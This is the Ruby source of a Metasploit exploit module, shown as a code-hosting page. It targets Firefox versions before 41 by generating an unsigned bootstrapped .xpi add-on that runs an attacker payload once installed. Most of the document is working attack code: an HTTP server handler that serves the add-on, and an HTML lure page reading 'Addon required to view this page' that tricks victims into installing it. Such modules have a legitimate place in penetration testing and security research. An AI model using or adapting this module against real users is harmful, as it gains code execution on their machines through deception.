Path: blob/master/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rex/zip'67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::HttpServer::HTML11include Msf::Exploit::Remote::FirefoxAddonGenerator1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',18'Description' => %q{19Mozilla Firefox before version 41 allowed users to install20unsigned browser extensions from arbitrary web servers.2122This module dynamically creates an unsigned .xpi addon file.23The resulting bootstrapped Firefox addon is presented to24the victim via a web page. The victim's Firefox browser25will pop a dialog asking if they trust the addon.2627Once the user clicks "install", the addon is installed and28executes the payload with full user permissions. As of Firefox294, this will work without a restart as the addon is marked to30be "bootstrapped". As the addon will execute the payload after31each Firefox restart, an option can be given to automatically32uninstall the addon once the payload has been executed.3334As of Firefox 41, unsigned extensions can still be installed35on Firefox Nightly, Unbranded and Development builds when36configured with `xpinstall.signatures.required` set to `false`.3738Note: this module generates legacy extensions which are39supported only in Firefox before version 57.40},41'License' => MSF_LICENSE,42'Author' => [ 'mihi', 'joev' ],43'DisclosureDate' => '2007-06-27',44'References' => [45[ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],46[ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],47[ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],48[ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],49[ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]50],51'Notes' => {52'Reliability' => [REPEATABLE_SESSION],53'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],54'Stability' => [CRASH_SAFE]55}56)57)58end5960def on_request_uri(cli, request)61if request.uri.match(/\.xpi$/i)62# browser has navigated to the .xpi file63print_status("Sending xpi and waiting for user to click 'accept'...")64if not xpi = generate_addon_xpi(cli)65print_error("Failed to generate the payload.")66send_not_found(cli)67else68send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })69end70else71# initial browser request72# force the user to access a directory-like URL73if not request.uri.match(/\/$/)74print_status("Redirecting request.")75send_redirect(cli, "#{get_resource}/")76else77# user has navigated78print_status("Sending HTML response.")79send_response_html(cli, generate_html)80end81end8283handler(cli)84end8586def generate_html87html = %Q|<html><head><title>Loading, Please Wait...</title>\n|88html << %Q|<meta http-equiv="refresh" content="0; url=addon.xpi"></head>\n|89html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|90html << %Q|</body></html>|91return html92end93end949596